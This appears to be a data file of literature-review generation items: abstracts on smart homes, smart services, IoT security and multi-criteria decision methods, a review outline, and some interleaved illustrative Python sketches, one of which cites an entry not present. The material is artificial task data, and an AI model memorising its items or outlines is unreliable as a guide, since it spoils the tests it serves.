comfort, convenience, security, entertainment, healthcare, education and communication of people in their home environments. Despite radical enhancements envisioned to peoples’ lives, the SH market has remained a niche for more than three decades. Yet, recent fast-paced developments, including ubiquitous computing, miniaturization of microelectronic components and digitalization of societies, have spurred a new wave of interest in a field populated by various technology platforms battling for dominance. In this light, we explore the determinants for wide-spread adoption of SH platforms informed by 21 experts from 19 companies. Our qualitative content analysis identifies, classifies, ranks and describes 34 determinants and yields a theoretical model on SH platform adoption. As such, we provide a basis for further research on platform ecosystems and managerial implications on platform design and governance in the SH field. In particular, we highlight the technical and organizational openness and the legitimacy of sponsorship. 
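The hierarchical, deadline-aware aggregation idea in the scalable real-time monitoring entry above can be illustrated with a small sketch; the agent structure, names, and deadline value below are assumptions made for illustration, not the scheme evaluated in that paper.

```python
# Illustrative sketch: domain-level agents aggregate their sensors' readings,
# and a root monitor keeps only aggregates collected within the deadline.
# Assumed structure; not the algorithm from the cited paper.
import time

class DomainAgent:
    def __init__(self, name, sensors):
        self.name, self.sensors = name, sensors   # sensors: callables returning floats

    def aggregate(self):
        readings = [read() for read in self.sensors]
        return {"domain": self.name,
                "mean": sum(readings) / len(readings),
                "timestamp": time.time()}

def collect(agents, deadline_s=0.5):
    start = time.time()
    met, missed = [], []
    for agent in agents:
        report = agent.aggregate()
        (met if time.time() - start <= deadline_s else missed).append(report)
    return met, missed

agents = [DomainAgent("floor-1", [lambda: 21.5, lambda: 22.1]),
          DomainAgent("floor-2", [lambda: 19.8])]
on_time, late = collect(agents)
print(len(on_time), "domain reports met the deadline")
```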
--- paper_title: Adaptive blurring of sensor data to balance privacy and utility for ubiquitous services paper_content: Given the trend towards mobile computing, the next generation of ubiquitous "smart" services will have to continuously analyze surrounding sensor data. More than ever, such services will rely on data potentially related to personal activities to perform their tasks, e.g. to predict urban traffic or local weather conditions. However, revealing personal data inevitably entails privacy risks, especially when data is shared with high precision and frequency. For example, by analyzing the precise electric consumption data, it can be inferred if a person is currently at home, however this can empower new services such as a smart heating system. Access control (forbid or grant access) or anonymization techniques are not able to deal with such trade-off because whether they completely prohibit access to data or lose source traceability. Blurring techniques, by tuning data quality, offer a wide range of trade-offs between privacy and utility for services. However, the amount of ubiquitous services and their data quality requirements lead to an explosion of possible configurations of blurring algorithms. To manage this complexity, in this paper we propose a platform that automatically adapts (at runtime) blurring components between data owners and data consumers (services). The platform searches the optimal trade-off between service utility and privacy risks using multi-objective evolutionary algorithms to adapt the underlying communication platform. We evaluate our approach on a sensor network gateway and show its suitability in terms of i) effectiveness to find an appropriate solution, ii) efficiency and scalability. --- paper_title: Prototyping Smart City applications over large scale M2M testbed paper_content: Many cities around the globe are adopting the use of Information and Communication Technology (ICT) as part of a strategy to transform into Smart Cities. These will allow cities in the developing world to cope with the ever increasing demand for services such as an effective electricity supply, healthcare and water management. Machine-to-Machine (M2M) communication standards play a vital role in enabling the development of Smart Cities by supporting new innovative services. Although Smart City services offer an exciting future, many challenges still have to be addressed in order to allow for mainstream adoption. This work focuses on issues related to prototyping Smart City services that utilize standardised M2M middleware platforms. In addition, the use of an inter-continental testbed for Smart City applications as an enabler for innovative, automated and interactive services is presented. The services developed will use an architecture which is based on the Smart City framework developed as part of the Testbeds for Reliable Smart City Machine-to-Machine Communication (TRESCIMO) project. These services will also serve as means to validate the use of Smart services within an African City's context. In addition, the architecture is validated by taking into account various real world use cases for Smart City applications. --- paper_title: Checkpoints, hotspots and standalones: placing smart services over time and place paper_content: From the user's point of view Ubicomp and smart environments have been researched especially in the home setting. Nevertheless, papers discussing the relationship of situated interaction and context are few. 
Effect of context on interaction has been mostly investigated in the mobile setting. To work towards filling this gap, this paper presents a set of interaction profiles for digital services placed in an environment. The main focus of this paper is on deployment of interaction with various smart services in various indoor places. Motivation for this study stems from the need to understand interaction in and with the environment in order to better design smart environments. To this end we analyzed 30 hand-drawn maps of three different indoor spaces with user designed smart service placements and interactions. The results indicate how multi-level, structural, activity and attention data can be combined in interaction profiles. Interaction profiles found in this work are checkpoint, hotspot, standalone, remote and object, which each represent a unique combination of physical structure, service content and preferred interaction method. These profiles and cognitive map data can be used to support smart environment design. --- paper_title: Smart servitization within the context of industrial user–supplier relationships: contingencies according to a machine tool manufacturer paper_content: Advanced manufacturing technologies (AMT) have been hailed as enablers to make industrial products and operations smart. The present paper argues that AMT can not only form a lever for developing smart goods and smart production environments, but can likewise form a basis to offer smart services and to propose servitized earning or payment models to industrial users. We do so on the basis of a literature review, followed by a case-based analysis of the AMT and servitization challenges to which a machine tool manufacturer is exposed in its industrial market environment. Consequently, the present study identifies a set of contingencies c.q. catalyzers with regard to seizing AMT for smart servitization practices within industrial business-to-business contexts. These are: the ability to capture relevant data; to exploit such data adequately and convert them into actionable knowledge; and to build trust among users and producers of capital goods in order to come to effective data exchange. We finish by deriving implications for smart servitization in a manufacturing context, and by outlining case-based lessons on how AMT and servitization can further interactive design and manufacturing practices in an industrial producer-user setting. We contend that there may be a gap between the technological and organizational readiness of (many) machine tool companies for smart servitization, on the one hand, and what different publications on AMT and Industry 4.0 are trying to make out. We also find that besides the high-tech and big data components to smart servitization, companies with an ambition in this field should take into account minimum/right information principles, to actually get to deep learning, and to establish a culture of trust with business partners, and inside implicated organizations among departments to create an environment in which smart servitized user-supplier relationships can prosper. --- paper_title: Time-constrained services: a framework for using real-time web services in industrial automation paper_content: The use of web services in industrial automation, e.g. in fully automated production processes like car manufacturing, promises simplified interaction among the manufacturing devices due to standardized protocols and increased flexibility with respect to process implementation and reengineering. 
Moreover, the adoption of web services as a seamless communication backbone within the overall industrial enterprise has additional benefits, such as simplified interaction with suppliers and customers (i.e. horizontal integration) and avoidance of a break in the communication paradigm within the enterprise (i.e. vertical integration). The Time-Constrained Services (TiCS) framework is a development and execution environment that empowers automation engineers to develop, deploy, publish, compose, and invoke time-constrained web services. TiCS consists of four functional layers—tool support layer, real-time infrastructural layer, real-time service layer, and hardware layer—which contain several components to meet the demands of a web service based automation infrastructure. This article gives an overview of the TiCS framework. More precisely, the general design considerations and an architectural blueprint of the TiCS framework are presented. Subsequently, selected key components of the TiCS framework are discussed in detail: the SOAP4PLC engine for equipping programmable logic controllers with a web service interface, the SOAP4IPC engine for processing web services in real-time on industrial PCs, the WS-TemporalPolicy language for describing time constraints, and the TiCS Modeler for composing time-constrained web services into a time-constrained BPEL4WS workflow. --- paper_title: Using a common architecture in Australian e-Government: the case of smart service Queensland paper_content: In this paper, we present the findings of a case study which examines the use of enterprise architectures in the context of the development and implementation of an Electronic Government (e-Government) Services Delivery initiative by the Queensland State government of Australia. The paper employs strategic alignment theory to critically examine the progress of the initiative from the development of public policy and business case documents, through to the pilot program, and progressive implementation of an electronic government environment that includes a number of redesigned Internet gateways, integrated contact (call) centres, electronic kiosks, and web-enabled customer service counters. The case is also compared with similar e-Government initiatives and provides an interesting example of how governments can use the electronic domain to service a diverse range of clients in a large and wide spread community. --- paper_title: Framework design for distributed service robotic systems paper_content: Service robot is one of the most promising industries in the future. Modular framework for designing and implementing a distributed service robot system including robot and intelligent environment is proposed. Components as sensors and actuators of a robotic system are standardized in both hardware and software design, resulting in an abstraction of digital smart devices with certain functions. A unified software platform with a core of Service-Oriented Architecture (SOA) middleware is established for the system. It employs the Player toolkit to access smart devices via drivers and interfaces, and the Web Service technology is introduced for automatic collaboration of smart services according to their functions. An implementation of a home-care service robotic system is described with 2D/3D realistic simulation. Experimental results validate the flexibility and open performance of the proposed demo system. 
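The time-constrained web service invocation addressed by the TiCS entry above can be approximated, for illustration, by bounding an ordinary HTTP/SOAP call with a deadline; the endpoint URL, payload, and deadline below are placeholders, and this is not the SOAP4PLC/SOAP4IPC API.

```python
# Illustrative sketch: invoke a web service with a hard deadline and report
# whether the time constraint was met. Endpoint and payload are placeholders.
import time
import requests

def invoke_with_deadline(url, payload, deadline_s=0.2):
    start = time.monotonic()
    try:
        # Note: requests' timeout bounds the connect/read phases, which is only
        # an approximation of a true end-to-end deadline.
        response = requests.post(url, data=payload, timeout=deadline_s)
        elapsed = time.monotonic() - start
        return {"ok": response.ok, "elapsed_s": elapsed,
                "deadline_met": elapsed <= deadline_s}
    except requests.exceptions.Timeout:
        return {"ok": False, "elapsed_s": deadline_s, "deadline_met": False}

result = invoke_with_deadline("http://plc.example/soap/start-drill", "<cmd>start</cmd>")
print(result)
```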
--- paper_title: A Smart Hospital Information System for Mental Disorders paper_content: This study aims to build a smart hospital information framework to deal with various medical information. First, a ubiquitous smart hospital information system model under WaaS (Wisdom as a Service) architecture is proposed. With this model, medical information can be organized into different levels. In this model, novel methods of organizing medical information (offline computing) and smart services delivering (online computing) are defined. The methods are used to supply medical knowledge recommendation services to patients according to their personalized condition and context. As a use case, a smart medical knowledge recommendation system, namely SKeWa, was built to reveal the usefulness of the model and the methods. --- paper_title: Applications of big data to smart cities paper_content: Many governments are considering adopting the smart city concept in their cities and implementing big data applications that support smart city components to reach the required level of sustainability and improve the living standards. Smart cities utilize multiple technologies to improve the performance of health, transportation, energy, education, and water services leading to higher levels of comfort of their citizens. This involves reducing costs and resource consumption in addition to more effectively and actively engaging with their citizens. One of the recent technologies that has a huge potential to enhance smart city services is big data analytics. As digitization has become an integral part of everyday life, data collection has resulted in the accumulation of huge amounts of data that can be used in various beneficial application domains. Effective analysis and utilization of big data is a key factor for success in many business and service domains, including the smart city domain. This paper reviews the applications of big data to support smart cities. It discusses and compares different definitions of the smart city and big data and explores the opportunities, challenges and benefits of incorporating big data applications for smart cities. In addition it attempts to identify the requirements that support the implementation of big data applications for smart city services. The review reveals that several opportunities are available for utilizing big data in smart cities; however, there are still many issues and challenges to be addressed to achieve better utilization of this technology. --- paper_title: Securing smart maintenance services: Hardware-security and TLS for MQTT paper_content: Increasing the efficiency of production and manufacturing processes is a key goal of initiatives like Industry 4.0. Within the context of the European research project ARROWHEAD, we enable and secure smart maintenance services. An overall goal is to proactively predict and optimize the Maintenance, Repair and Operations (MRO) processes carried out by a device maintainer, for industrial devices deployed at the customer. Therefore it is necessary to centrally acquire maintenance relevant equipment status data from remotely located devices over the Internet. Consequently, security and privacy issues arise from connecting devices to the Internet, and sending data from customer sites to the maintainer's back-end. In this paper we consider an exemplary automotive use case with an AVL Particle Counter (APC) as device. 
The APC transmits its status information by means of a fingerprint via the publish-subscribe protocol Message Queue Telemetry Transport (MQTT) to an MQTT Information Broker in the remotely located AVL back-end. In a threat analysis we focus on the MQTT routing information asset and identify two elementary security goals in regard to client authentication. Consequently we propose a system architecture incorporating a hardware security controller that processes the Transport Layer Security (TLS) client authentication step. We validate the feasibility of the concept by means of a prototype implementation. Experimental results indicate that no significant performance impact is imposed by the hardware security element. The security evaluation confirms the advanced security of our system, which we believe lays the foundation for security and privacy in future smart service infrastructures. --- paper_title: Health Smart Home Services incorporating a MAR-based Energy Consumption Awareness System paper_content: Health smart homes would enable people suffering from various diseases and handicaps to live an autonomous lifestyle in their own residences. The concept of the health smart home emphasizes ‘aging in place’, where residents enjoy a healthy independent life in their own homes as they become older. While energy saving is one of the crucial issues to be addressed in domestic buildings, there is little research into household energy consumption in health smart homes. This paper identifies each variable’s implications for health smart home services and highlights its application to energy consumption awareness. We also introduce Mobile Augmented Reality (MAR) to simulate energy consumption awareness in health smart homes. Firstly, the research proposes a framework for constructing health smart home services with a focus on the practicability of each variable from the perspective of supporting user experience in home settings. Rather than address each variable in isolation, we consider comprehensive issues in terms of service effectiveness in supporting a healthy life at home. Additionally, the innovative MAR application associated with energy use is presented as a new solution for household energy consumption awareness. The proposed application will be a basis for the perspectives of future research directions on health smart home services. --- paper_title: Conceptual framework for services creation/development environment in telecom domain paper_content: The telecom service providers (fixed and mobile) understand that they must bring in new smart services in order to attract new customers, retain existing ones and increase revenue. The challenges and goals for doing so are as follows: determining which services are needed; introducing more services in a faster manner and at lower costs; delivering innovative services in a way that allows existing users to migrate smoothly to new ones. These goals could not be achieved with traditional closed and proprietary network infrastructure, as the vendor lock-in involved in that infrastructure results in limited scope of services, and dependency on old business models. New services require a much greater degree of system flexibility, performance and scalability, as well as open standards. Next Generation Network (NGN) provide the means for enabling agile service creation capabilities that facilitate better user experiences by integrating both new and legacy services across any access. 
However, NGNs involve complex structures even for simple services, as they consist of a large number of building blocks and necessitate hierarchical models with many parallel subsystems. Thus, particular attention has to be paid to understanding and modelling the performance of these systems. The rationale of this paper lies in developing a design and engineering methodology (based on a mathematical foundation) that addresses the service creation aspects for those fields in which traditional approaches will not work for NGNs. --- paper_title: ESTADO — Enabling smart services for industrial equipment through a secured, transparent and ad-hoc data transmission online paper_content: The advent of initiatives like Industry 4.0 promises increased operational efficiency through smart services and interconnected devices. To enable smart maintenance services for today's and future industrial equipment, regular status information must be transmitted from device customers to maintenance service providers over the Internet. However, simply attaching an industrial device to the Internet often leads to a security and privacy nightmare. Transparency about when and what data is being transmitted is of crucial interest to a customer. During transport, data must be protected against modifications and disclosure. A maintainer requires trust in the data's origin and integrity. In this paper, we propose ESTADO, a system that enables smart services by providing the necessary connectivity from industrial equipment to service providers for device state tracking. Our system design focuses on the migration of current devices and the security aspect. Using a non-permanent NFC based connection, connectivity is only established ad-hoc on customer demand, and any data transmission is fully transparent to a customer. We study our design through a prototype implementation using an Infineon security controller and evaluate the security, usability and deployment aspects of our solution. --- paper_title: Design and implementation of the first aid assistance service based on Smart-M3 platform paper_content: Smart technologies may be successfully applied in healthcare for the creation of IoT-enabled proactive pre-hospital and first aid assistance mobile services. A variety of smart services for m-Health scenarios may be constructed through the interaction of multiple knowledge processors (software agents) running on devices of the IoT environment. Thus, IoT-enabled m-Health applications should provide a connection with the smart space. It is possible to build such services with the Smart-M3 platform. The ontology describes the interaction rules and the high-level design of the service. The first aid assistance scenario was chosen as the basic one. According to this scenario, sympathetic people provide first aid to patients in case of emergency. The study focuses on the implementation of the first aid assistance service, which consists of knowledge processors running on Linux servers and Android mobile devices. Such a service should be scalable when adding new modules, sensors or participants. The purpose is to evaluate the applicability of the smart spaces approach for implementing mobile first aid services. In addition, implementation issues on the server and client sides are discussed. --- paper_title: Sustainability and competitiveness through digital product-service-systems paper_content: This paper introduces an innovative approach towards Digital Product-Service-Systems that need to be addressed in building a sustainable future.
As such, it serves as a foundation for more in-depth studies. The research attempts to present a usable guideline for small and medium-sized companies in order to complement product service systems with digital services. By applying the guideline developed within the research activity, companies shall be able to increase the value of their PSS offering and therefore creating a sustainable competitive advantage for their business solutions. It also highlights the interdependence of sustainability issues and the emergence of Product-Service-Systems. --- paper_title: Strategies in Smart Service Systems Enabled Multi-sided Markets: Business Models for the Internet of Things paper_content: Internet of Things has the potential to disrupt industries through changing products, services, and business models just as the Internet did in the '90s. Machine-to-machine communication is at the core of Internet of Things. Machines that we interact with in everyday life will start interacting with each other, collect data, and even use advances in data technologies to make decisions for us. Organizations, in order to achieve the highest profit, should also redesign their business service models conscientiously around externalities across markets that link through platforms and be specific about which markets to serve. In this research, we aim to build business ownership strategies to further two-sided markets and platforms literature. Herein, we focus on a number of business service models that link four sides of a market, and compare the advantages and disadvantages of network externalities generated by Internet of Things in each model. --- paper_title: A Pricing Model for the Internet of Things Enabled Smart Service Systems paper_content: How can firms price their products and services, as their ecosystems get smarter? In order to answer this question, this paper provides a stylized model and its expansion to characterize industries that have become smarter and connected through the introduction of smart devices, a.k.a. the Internet of Things. First, we propose a basic model for a duopolistic multi-sided market with externality effects. Next, we expand this model to a case that considers cross-market network externalities. Our results reveal that, even if Internet of Things technologies facilitate complex multi-sided markets, there is a strategic pricing solution for firm profits. Moreover, a strategic firm can benefit from aforementioned cross-market externalities in terms of higher market share and equilibrium prices. This study not only contributes to the theories of pricing information goods, but also provides a guideline for practitioners who make pricing and other strategic decisions for the Internet of Things enabled goods and services. ---
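The MQTT-over-TLS client authentication discussed in the smart-maintenance entries above (hardware-backed key storage aside) can be sketched with the paho-mqtt library; the broker address, topic, certificate paths, and payload are placeholder assumptions, and the constructor follows the paho-mqtt 1.x style.

```python
# Illustrative sketch: publish a device status fingerprint over MQTT with
# mutual TLS (client certificate authentication). Broker, topic and file
# paths are placeholders; paho-mqtt 2.x additionally expects a
# CallbackAPIVersion argument in the Client() constructor.
import json
import paho.mqtt.client as mqtt

client = mqtt.Client(client_id="apc-0001")
# Server verification via the CA certificate; client authentication via cert + key.
client.tls_set(ca_certs="ca.crt", certfile="device.crt", keyfile="device.key")

client.connect("broker.example.com", 8883)
client.loop_start()                          # background network loop
fingerprint = {"device": "apc-0001", "operating_hours": 1532, "status": "ok"}
info = client.publish("maintenance/apc-0001/fingerprint",
                      json.dumps(fingerprint), qos=1)
info.wait_for_publish()                      # block until the QoS 1 publish completes
client.loop_stop()
client.disconnect()
```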
Title: Focusing the customer through smart services: a literature review Section 1: Introduction Description 1: Provide a holistic overview of past research and opportunities for further research in the field of smart services using a systematic literature review approach. Section 2: Smart services and a smart service lifecycle Description 2: Define smart services and describe the phases of the smart service lifecycle as adapted from the Information Technology Infrastructure Library (ITIL) framework. Section 3: Research design Description 3: Explain the methodology for identifying and analyzing relevant literature, including the literature search strategy and analysis process. Section 4: Identifying relevant literature Description 4: Describe the systematic search process across various databases and the criteria for selecting relevant articles. Section 5: Analyzing the identified literature Description 5: Outline the steps involved in analyzing the literature, including formal exploration and thematic categorization of the identified articles. Section 6: Findings Description 6: Present the results of the formal and content analysis, categorize the literature based on lifecycle phases, and create a heat map to show research intensity. Section 7: Discussion of research gaps and further research topics Description 7: Summarize research intensity, identify unexplored areas, and propose five specific fields for further investigation in smart service research. Section 8: Limitations Description 8: Acknowledge the limitations of the literature search and analysis process, including the scope of databases and search terms used. Section 9: Conclusions Description 9: Provide a summary of the review, emphasize the importance of further research, and outline concrete ideas for advancing the understanding of smart services.
Application of MCDM Methods in Sustainability Engineering: A Literature Review 2008–2018
9
--- paper_title: A multicriteria model for the selection of the transport service provider: A single valued neutrosophic DEMATEL multicriteria model paper_content: The decision-making process requires, a priori, defining and considering certain factors, especially when it comes to complex areas such as transport management in companies. One of the most important items in the initial phase of the transport process that significantly influences its further flow is decision-making about the choice of the most favorable transport provider. In this paper a model for evaluating and selecting a transport service provider based on a single valued neutrosophic number (SVNN) is presented. The neutrosophic set concept represents a general platform that extends the concepts of classical sets, fuzzy sets, intuitionistic fuzzy sets, and an interval valued intuitionistic fuzzy sets. The application of the SVNN concept made a modification of the DEMATEL method (Decision-making Trial and Evaluation Laboratory Method) and proposed a model for ranking alternative solutions. The SVNN-DEMATEL model defines the mutual effects of the provider's evaluation criteria, while, in the second phase of the model, alternative providers are evaluated and ranked. The SVNN-DEMATEL model was tested on a hypothetical example of evaluation of five providers of transport services. --- paper_title: Sustainable and Renewable Energy: An Overview of the Application of Multiple Criteria Decision Making Techniques and Approaches paper_content: The main purpose of this paper is to present a systematic review of MCDM techniques and approaches in sustainable and renewable energy systems problems. This study reviewed a total of 54 papers published from 2003–2015 in more than 20 high-ranking journals, most related to sustainable and renewable energies, and which were extracted from the Web of Science database. In the category of application areas, papers were classified into two main groups: (1) sustainable energy and (2) renewable energy. Furthermore, in the classification of techniques and approaches, the papers were categorized into six groups: (1) AHP and F-AHP; (2) ANP and VIKOR; (3) TOPSIS and F-TOPSIS; (4) PROMETHEE; (5) integrated methods and (6) other methods. In addition, papers were reviewed based on the authors’ nationalities, the publication date, techniques and approaches, the name of journal and studies criteria. The results of this study indicated that, in 2015, scholars have published more papers than in other years. Furthermore, AHP/fuzzy AHP and integrated methods were ranked as the first rank, with 14 papers. Additionally, Journal of Renewable Energy is the first journal, with 16 publications, and this was the most significant journal in this study. Findings of this review paper confirm that MCDM techniques can assist stakeholders and decision makers in unravelling some of the uncertainties inherent in environmental decision making, and these techniques demonstrate a growing interest of previous scholars to apply these techniques for solving different stages of sustainable and renewable energy systems. --- paper_title: A novel integrated decision-making approach for the evaluation and selection of renewable energy technologies paper_content: The decision-making in energy sector involves finding a set of energy sources and conversion devices to meet the energy demands in an optimal way. 
Making an energy planning decision involves the balancing of diverse ecological, social, technical and economic aspects across space and time. Usually, technical and environmental aspects are represented in the form of multiple criteria and indicators that are often expressed as conflicting objectives. In order to attain higher efficiency in the implementation of renewable energy (RE) systems, the developers and investors have to deploy multi-criteria decision-making techniques. In this paper, a novel hybrid Decision Making Trial and Evaluation Laboratory and analytic network process (DEMATEL-ANP) model is proposed in order to stress the importance of the evaluation criteria when selecting alternative REs and the causal relationships between the criteria. Finally, complex proportional assessment and weighted aggregated sum product assessment methods are used to assess the performances of the REs with respect to different evaluating criteria. An illustrative example from the Costs Assessment of Sustainable Energy Systems (CASES) project, financed by the European Commission Framework 6 programme (EU FM 6) for EU member states, is presented in order to demonstrate the application feasibility of the proposed model for the comparative assessment and ranking of RE technologies. Sensitivity analysis, result validation and critical outcomes are provided as well to offer guidelines for policy makers in the selection of the best alternative RE with the maximum effectiveness. --- paper_title: Evaluating construction projects of hotels based on environmental sustainability with MCDM framework paper_content: Environmental issues have received considerable attention in daily life activities. Sustainability has penetrated all societal practices, especially the construction industry, due to its substantial impact on the environment. Monitoring and controlling an architectural project involves a decision problem requiring multi-variety analysis. This study aimed to evaluate construction projects of hotels regarding environmental sustainability. To this end, a hybrid Multiple Criteria Decision Making (MCDM) model is proposed. Step-wise Weight Assessment Ratio Analysis (SWARA) and Complex Proportional Assessment (COPRAS) compose a unified framework. A private construction project is considered as a case study. The project is based on establishing a five star hotel in Tehran, Iran. In this research, SWARA produces the criteria weights and COPRAS ranks the decision alternatives. This study can be a strategic route for similar research in other fields. --- paper_title: An exploration of measures of social sustainability and their application to supply chain decisions paper_content: Sustainability recognizes the interdependence of ecological, social, and economic systems – the three pillars of sustainability. The definition of corporate social responsibility (CSR) often advocates ethical behavior with respect to these systems. As more corporations commit to sustainability and CSR policies, there is increasing pressure to consider social impacts throughout the supply chain. This paper reviews metrics, indicators, and frameworks of social impacts and initiatives relative to their ability to evaluate the social sustainability of supply chains. Then, the relationship between business decision-making and social sustainability is explored with attention initially focused on directly impacting national level measures.
A general strategy for considering measures of social sustainability is proposed, and a variety of indicators of CSR are described. Several of these indicators are then employed in an example to demonstrate how they may be applied to supply chain decision-making. --- paper_title: A review of multi-criteria decision-making applications to solve energy management problems: Two decades from 1995 to 2015 paper_content: Energy management problems associated with rapid institutional, political, technical, ecological, social and economic development have been of critical concern to both national and local governments worldwide for many decades; thus, addressing such issues is a global priority. The main objective of this study is to provide a review of the application and use of decision-making approaches in regard to energy management problems. This paper selected and reviewed 196 published papers from 1995 to 2015 in 72 important journals related to energy management, chosen from the "Web of Science" database; in this regard, the systematic review and meta-analysis method called "PRISMA" has been followed. All published papers were categorized into 13 different fields: environmental impact assessment, waste management, sustainability assessment, renewable energy, energy sustainability, land management, green management topics, water resources management, climate change, strategic environmental assessment, construction and environmental management and other energy management areas. Furthermore, papers were categorized based on the authors, publication year, nationality of authors, region, technique and application, number of criteria, research purpose, gap and contribution, solution and modeling, results and findings. Hybrid MCDM and fuzzy MCDM, within the integrated methods, were ranked as the most frequently used methods. The Journal of Renewable and Sustainable Energy Reviews was the most important journal in this review, with 32 published papers. Finally, environmental impact assessment was ranked as the first area that applied decision-making approaches. Results of this study acknowledge that decision-making approaches can help decision makers and stakeholders in solving problems under uncertain situations in environmental decision making, and these approaches have seen increasing interest among previous researchers for use in various steps of the environmental decision-making process. --- paper_title: Principal sustainability components: empirical analysis of synergies between the three pillars of sustainability paper_content: Starting from the concept of three fundamental sustainability dimensions (environmental, social, and economic), this study investigated professional contributions to sustainability by means of principal component analysis (PCA). Graduates from the Environmental Sciences program (N = 542) at ETH Zurich described their best professional contributions to sustainable development. Next, they evaluated whether their best practice example contributed to achieving any of the five environmental, social, and economic objectives of the Swiss national sustainability strategy. These judgments served as the basis for a PCA aiming to identify principal sustainability components (PSCs) covering typical synergies between sustainability objectives within and transcending the three fundamental dimensions. Three PSCs capturing important synergies were identified.
PSC 1 Product and Process Development reflects how ecological innovation and modernization can generate social and economic benefits and at the same time facilitate... --- paper_title: A NOVEL HYBRID METHOD FOR NON-TRADITIONAL MACHINING PROCESS SELECTION USING FACTOR RELATIONSHIP AND MULTI-ATTRIBUTIVE BORDER APPROXIMATION METHOD paper_content: Selection of the most appropriate non-traditional machining process (NTMP) for a specific machining requirement can be viewed as a multi-criteria decision-making (MCDM) problem with conflicting criteria. This paper proposes a novel hybrid method encompassing the factor relationship (FARE) and multi-attributive border approximation area comparison (MABAC) methods for the selection and evaluation of NTMPs. The application of the FARE method is pioneered in the NTMP assessment domain to estimate criteria weights. It significantly condenses the problem of pairwise comparisons for estimating criteria weights in an MCDM environment. In order to analyze and rank different NTMPs in accordance with their performance and technical properties, the MABAC method is applied. The computational procedure of the FARE-MABAC hybrid model is demonstrated while solving an NTMP selection problem for drilling cylindrical through holes on non-conductive ceramic materials. The results achieved by the FARE-MABAC method corroborate exactly with those obtained by past researchers, which validates the usefulness of this method for solving complex NTMP selection problems. --- paper_title: SUSTAINABLE DECISION MAKING IN CIVIL ENGINEERING paper_content: The paper deals with the intergenerational aspects of decision making in regard to lifecycle benefit-based design and maintenance planning for civil engineering facilities. Firstly, the concept of the Life Quality Index as a measure for assessing the feasibility of life-saving activities as well as for including the societal cost consequences of fatalities into engineering decision making is introduced. Thereafter a general framework is outlined facilitating the quantification of sustainable decision making in an intergenerational perspective. Subsequently, some basic results from renewal theory are provided and suggested as a framework for lifecycle benefit-based design and maintenance planning. The aspects of discounting in the context of sustainability are then addressed, including the problem of intergenerational discounting and overlapping generations. Finally, an example considering optimal design is given. --- paper_title: A comprehensive review of data envelopment analysis (DEA) approach in energy efficiency paper_content: The main aim of this review article is to review DEA models in regard to energy efficiency. This paper reviewed and summarized the different models of DEA that have been applied around the world to energy efficiency problems. Consequently, a review of 144 published scholarly papers appearing in 45 high-ranking journals between 2006 and 2015 has been carried out to achieve a comprehensive review of DEA application in energy efficiency. Accordingly, the selected articles have been categorized based on year of publication, author(s)' nationalities, scope of study, time duration, application area, study purpose, results and outcomes. Results of this review paper indicated that DEA showed great promise to be a good evaluative tool for future analysis on energy efficiency issues, where the production function between the inputs and outputs was virtually absent or extremely difficult to acquire.
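Since several of the energy-efficiency studies reviewed above rely on data envelopment analysis, the following is a minimal sketch of the standard input-oriented CCR DEA model solved as a linear program. The three decision-making units and their input/output data are hypothetical and are not taken from any of the cited papers.

```python
# Minimal input-oriented CCR DEA sketch (hypothetical data, standard multiplier form):
# for DMU o, maximise u*y_o subject to v*x_o = 1 and u*y_j - v*x_j <= 0 for all j.
import numpy as np
from scipy.optimize import linprog

X = np.array([[2.0, 3.0], [4.0, 1.0], [3.0, 2.0]])   # inputs  (3 DMUs x 2 inputs)
Y = np.array([[1.0], [1.0], [1.5]])                   # outputs (3 DMUs x 1 output)
n, m = X.shape
s = Y.shape[1]

def ccr_efficiency(o):
    c = np.concatenate([-Y[o], np.zeros(m)])                     # minimise -u*y_o
    A_ub = np.hstack([Y, -X])                                    # u*y_j - v*x_j <= 0 for every DMU j
    b_ub = np.zeros(n)
    A_eq = np.concatenate([np.zeros(s), X[o]]).reshape(1, -1)    # normalisation v*x_o = 1
    b_eq = np.array([1.0])
    res = linprog(c, A_ub=A_ub, b_ub=b_ub, A_eq=A_eq, b_eq=b_eq,
                  bounds=[(0, None)] * (s + m), method="highs")
    return -res.fun                                              # efficiency score in (0, 1]

for o in range(n):
    print(f"DMU {o}: efficiency = {ccr_efficiency(o):.3f}")
```

A score of 1 marks a unit on the efficient frontier; scores below 1 indicate how far the unit's inputs could, in principle, be contracted while keeping its outputs.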
--- paper_title: Evaluating the performance of suppliers based on using the R'AMATEL-MAIRCA method for green supply chain implementation in electronics industry paper_content: Abstract Green supply chain management (GSCM) practitioners striving to create a healthier environment should first identify the key criteria pertinent to the process of implementing the appropriate sustainable policies, particularly in the most rapidly growing electronics sector. Since the decision to adopt GSCM in electronics industry is associated with the use of a multi-dimensional approach involving a number of qualitative criteria, the paper examines GSCM based on fifteen criteria expressed in five dimensions and proposes a multi-criteria evaluation framework for selecting suitable green suppliers. In real life, the assessment of this decision is based on vague information or imprecise data of the expert's subjective judgements, including the feedback from the criteria and their interdependence. Thus to treat this uncertainty in multi-criteria decision making (MCDM) process, rough number (RN) is applied here using only the internal knowledge in the operative data available to the decision-makers. In this way objective imprecisions and uncertainties are used and there is no need to rely on models of assumptions. Instead of different external parameters in the application of RN, the structure of the given data is used. Therefore, the identified components are incorporated into a rough DEMATEL-ANP (R'AMATEL) method, combining the Decision Making Trial and Evaluation Laboratory Model (DEMATEL) and the Analytical Network Process (ANP) in a rough context. In group decision making, a rough number-based approach aggregates individual judgements and handles imprecision. The structure of the relationships between the criteria expressed in different dimensions is determined by using the rough DEMATEL (R'DAMETEL) method and building an influential network relation mapping, based on which the rough ANP (R'ANP) method is implemented to obtain the respective criteria weights. Then, the rough multi-attribute Ideal-Real Comparative Analysis (R'MAIRCA) is used to evaluate the environmental performance of suppliers for each evaluation criterion. Sensitivity analysis is performed to determine the impact of the weights of criteria and the influence of the decision maker's preferences on the final evaluation results. Applying the Spearman's rank correlation coefficient and other ranking methods, the stability of the alternative rankings based on the variation in the criteria weights is checked. The results obtained in the study show that the proposed method significantly increases the objectivity of supplier assessment in a subjective environment. --- paper_title: Multi-criteria decision making approaches for green supply chains: a review paper_content: Designing Green Supply Chains (GSCs) requires complex decision-support models that can deal with multiple dimensions of sustainability while taking into account specific characteristics of products and their supply chain. Multi-Criteria Decision Making (MCDM) approaches can be used to quantify trade-offs between economic, social, and environmental criteria i.e. to identify green production options. The aim of this paper is to review the use of MCDM approaches for designing efficient and effective GSCs. We develop a conceptual framework to find relevant publications and to categorise papers with respect to decision problems, indicators, and MCDM approaches. 
